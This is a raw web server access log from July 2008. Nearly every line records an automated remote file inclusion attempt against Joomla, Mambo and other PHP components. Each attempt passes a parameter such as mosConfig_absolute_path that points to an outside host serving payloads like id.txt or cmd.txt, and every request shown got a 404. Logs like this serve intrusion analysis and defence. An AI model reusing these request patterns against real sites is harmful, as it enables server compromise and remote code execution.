89.108.124.54 - - [06/Jul/2008:19:42:27 -0700] "GET /logs/access_080609.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
203.155.1.251 - - [06/Jul/2008:19:42:38 -0700] "GET /logs/access_080602.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.155.1.251 - - [06/Jul/2008:19:42:43 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.155.1.251 - - [06/Jul/2008:19:42:50 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
89.111.176.64 - - [06/Jul/2008:19:44:14 -0700] "GET /logs/access_080602.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.176.64 - - [06/Jul/2008:19:44:15 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.176.64 - - [06/Jul/2008:19:44:16 -0700] "GET /logs/access_080609.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.176.64 - - [06/Jul/2008:19:46:52 -0700] "GET /logs/access_080602.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/acc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.176.64 - - [06/Jul/2008:19:46:52 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/acc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.176.64 - - [06/Jul/2008:19:46:53 -0700] "GET /logs/access_080609.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/acc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.126.108.198 - - [06/Jul/2008:19:50:13 -0700] "GET /logs/access_080526.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/disconnectgp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.126.108.198 - - [06/Jul/2008:19:50:15 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/disconnectgp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.126.108.198 - - [06/Jul/2008:19:50:15 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/disconnectgp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
202.181.105.117 - - [06/Jul/2008:19:59:22 -0700] "GET /logs/main.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [06/Jul/2008:19:59:22 -0700] "GET /logs/access_080526.log/main.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [06/Jul/2008:19:59:22 -0700] "GET /main.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [06/Jul/2008:19:59:35 -0700] "GET /logs/access_080602.log/main.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:19:59:43 -0700] "GET /logs/access_080324.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:19:59:43 -0700] "GET /logs/access_080324.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:19:59:43 -0700] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:19:59:44 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:19:59:44 -0700] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:19:59:45 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
203.155.1.251 - - [06/Jul/2008:20:01:47 -0700] "GET /logs/access_080609.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:20:04:31 -0700] "GET /logs/access_080609.log//init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.66.101 - - [06/Jul/2008:20:05:32 -0700] "GET ///www.doomhammerallianceraiding.com/phpraider/authentication/phpbb3/phpbb3.functions.php?http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:20:06:00 -0700] "GET /logs/access_080331.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:20:06:00 -0700] "GET /logs/access_080331.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
89.108.66.101 - - [06/Jul/2008:20:10:06 -0700] "GET /logs/access_080602.log///www.doomhammerallianceraiding.com/phpraider/authentication/phpbb3/phpbb3.functions.php?http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.66.101 - - [06/Jul/2008:20:10:06 -0700] "GET ///www.doomhammerallianceraiding.com/phpraider/authentication/phpbb3/phpbb3.functions.php?http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.66.101 - - [06/Jul/2008:20:10:06 -0700] "GET /logs///www.doomhammerallianceraiding.com/phpraider/authentication/phpbb3/phpbb3.functions.php?http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.63.2.169 - - [06/Jul/2008:20:13:06 -0700] "GET /logs/access_080505.log/index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
74.63.2.169 - - [06/Jul/2008:20:13:06 -0700] "GET /logs/index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
74.63.2.169 - - [06/Jul/2008:20:13:06 -0700] "GET /index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
59.126.46.141 - - [06/Jul/2008:20:13:16 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
59.126.46.141 - - [06/Jul/2008:20:13:17 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.25.142.64 - - [06/Jul/2008:20:14:34 -0700] "GET /logs/index.php?redir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.mathstamps.com"
85.25.142.64 - - [06/Jul/2008:20:14:38 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.mathstamps.com"
85.25.142.64 - - [06/Jul/2008:20:14:39 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.mathstamps.com"
85.25.142.64 - - [06/Jul/2008:20:14:40 -0700] "GET /index.php?redir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.mathstamps.com"
203.88.121.128 - - [06/Jul/2008:20:17:02 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.nipservers.com/modules/Forums/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
200.20.120.10 - - [06/Jul/2008:20:17:19 -0700] "GET /logs/access_080526.log//init_basic.php?GALLERY_BASEDIR=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
200.20.120.10 - - [06/Jul/2008:20:17:24 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
200.20.120.10 - - [06/Jul/2008:20:17:30 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:20:18:27 -0700] "GET /logs/access_080317.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:20:18:28 -0700] "GET /logs/access_080317.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
70.84.182.98 - - [06/Jul/2008:20:19:17 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/testsken/files/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.mathstamps.com"
70.84.182.98 - - [06/Jul/2008:20:19:17 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/testsken/files/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.mathstamps.com"
193.178.228.12 - - [06/Jul/2008:20:24:04 -0700] "GET //body_comm.inc.php?content=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.mathstamps.com"
193.178.228.12 - - [06/Jul/2008:20:24:04 -0700] "GET /logs//body_comm.inc.php?content=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.mathstamps.com"
217.16.26.124 - - [06/Jul/2008:20:24:11 -0700] "GET //body_comm.inc.php?content=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.mathstamps.com"
217.16.26.124 - - [06/Jul/2008:20:24:11 -0700] "GET /logs//body_comm.inc.php?content=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.mathstamps.com"
200.126.108.198 - - [06/Jul/2008:20:24:50 -0700] "GET /logs/access_080609.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/disconnectgp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
195.54.9.218 - - [06/Jul/2008:20:26:07 -0700] "GET /logs/access_080609.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [06/Jul/2008:20:26:07 -0700] "GET /logs/access_080609.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [06/Jul/2008:20:26:08 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [06/Jul/2008:20:26:08 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [06/Jul/2008:20:26:08 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [06/Jul/2008:20:26:08 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [06/Jul/2008:20:27:09 -0700] "GET /logs/access_080526.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [06/Jul/2008:20:27:16 -0700] "GET /logs/access_080526.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
193.178.228.12 - - [06/Jul/2008:20:27:22 -0700] "GET /logs/access_080526.log//body_comm.inc.php?content=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
193.178.228.12 - - [06/Jul/2008:20:27:23 -0700] "GET //body_comm.inc.php?content=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
193.178.228.12 - - [06/Jul/2008:20:27:23 -0700] "GET /logs//body_comm.inc.php?content=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
217.16.26.124 - - [06/Jul/2008:20:27:34 -0700] "GET /logs/access_080526.log//body_comm.inc.php?content=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.16.26.124 - - [06/Jul/2008:20:27:34 -0700] "GET /logs/access_080526.log//body_comm.inc.php?content=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.16.26.124 - - [06/Jul/2008:20:27:34 -0700] "GET //body_comm.inc.php?content=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.16.26.124 - - [06/Jul/2008:20:27:34 -0700] "GET //body_comm.inc.php?content=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.16.26.124 - - [06/Jul/2008:20:27:35 -0700] "GET /logs//body_comm.inc.php?content=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.16.26.124 - - [06/Jul/2008:20:27:35 -0700] "GET /logs//body_comm.inc.php?content=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
59.126.46.141 - - [06/Jul/2008:20:27:45 -0700] "GET /logs/access_080421.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/testsken/files/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
59.126.46.141 - - [06/Jul/2008:20:27:46 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/testsken/files/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
59.126.46.141 - - [06/Jul/2008:20:27:47 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/testsken/files/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
59.126.46.141 - - [06/Jul/2008:20:28:20 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/testsken/files/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.203.245.7 - - [06/Jul/2008:20:29:27 -0700] "GET /logs/access_080602.log//components/com_performs/performs.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.203.245.7 - - [06/Jul/2008:20:29:27 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.203.245.7 - - [06/Jul/2008:20:29:28 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.88.121.128 - - [06/Jul/2008:20:29:38 -0700] "GET /logs/access_080609.log/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.nipservers.com/modules/Forums/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
203.88.121.128 - - [06/Jul/2008:20:29:38 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.nipservers.com/modules/Forums/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
203.88.121.128 - - [06/Jul/2008:20:29:39 -0700] "GET /logs/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.nipservers.com/modules/Forums/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
195.54.9.218 - - [06/Jul/2008:20:30:40 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/fuck.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
70.87.197.18 - - [06/Jul/2008:20:38:00 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.202.210 - - [06/Jul/2008:20:38:22 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
195.54.9.218 - - [06/Jul/2008:20:38:50 -0700] "GET /logs/access_080609.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/fuck.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [06/Jul/2008:20:38:51 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/fuck.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [06/Jul/2008:20:39:17 -0700] "GET /logs/access_080526.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/fuck.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:20:39:29 -0700] "GET /logs/access_080526.log/index2.php?DoAction=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:20:39:30 -0700] "GET /index2.php?DoAction=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:20:39:30 -0700] "GET /logs/index2.php?DoAction=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
81.208.98.130 - - [06/Jul/2008:20:39:49 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:20:40:05 -0700] "GET /logs/access_080428.log/index2.php?DoAction=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.176.88 - - [06/Jul/2008:20:40:10 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.176.88 - - [06/Jul/2008:20:40:10 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:20:41:40 -0700] "GET /logs/access_080526.log/index2.php?DoAction=http://mobileathleticclub.com/sales-images/index_46.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
203.146.170.160 - - [06/Jul/2008:20:41:41 -0700] "GET /logs/access_080602.log//components/com_performs/performs.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:20:41:41 -0700] "GET /index2.php?DoAction=http://mobileathleticclub.com/sales-images/index_46.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
203.146.170.160 - - [06/Jul/2008:20:41:41 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:20:41:41 -0700] "GET /logs/index2.php?DoAction=http://mobileathleticclub.com/sales-images/index_46.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
203.146.170.160 - - [06/Jul/2008:20:41:45 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:20:43:06 -0700] "GET /logs/access_080428.log/index2.php?DoAction=http://mobileathleticclub.com/sales-images/index_46.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:20:43:21 -0700] "GET /logs/access_080303.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:20:43:22 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:20:43:22 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:20:43:50 -0700] "GET /logs/access_080428.log/config.inc.php?path_escape=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:20:43:50 -0700] "GET /config.inc.php?path_escape=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:20:43:51 -0700] "GET /logs/config.inc.php?path_escape=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:20:43:52 -0700] "GET /logs/access_080519.log/config.inc.php?path_escape=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:20:45:49 -0700] "GET /logs/access_080331.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
68.76.31.154 - - [06/Jul/2008:20:46:35 -0700] "GET /logs/access_080602.log/joomla/index.php?option=com_restaurante&task=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
68.76.31.154 - - [06/Jul/2008:20:46:35 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
68.76.31.154 - - [06/Jul/2008:20:46:36 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
125.245.146.189 - - [06/Jul/2008:20:46:40 -0700] "GET /logs/access_080526.log/lostpasswd.php?env[include_prefix]=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
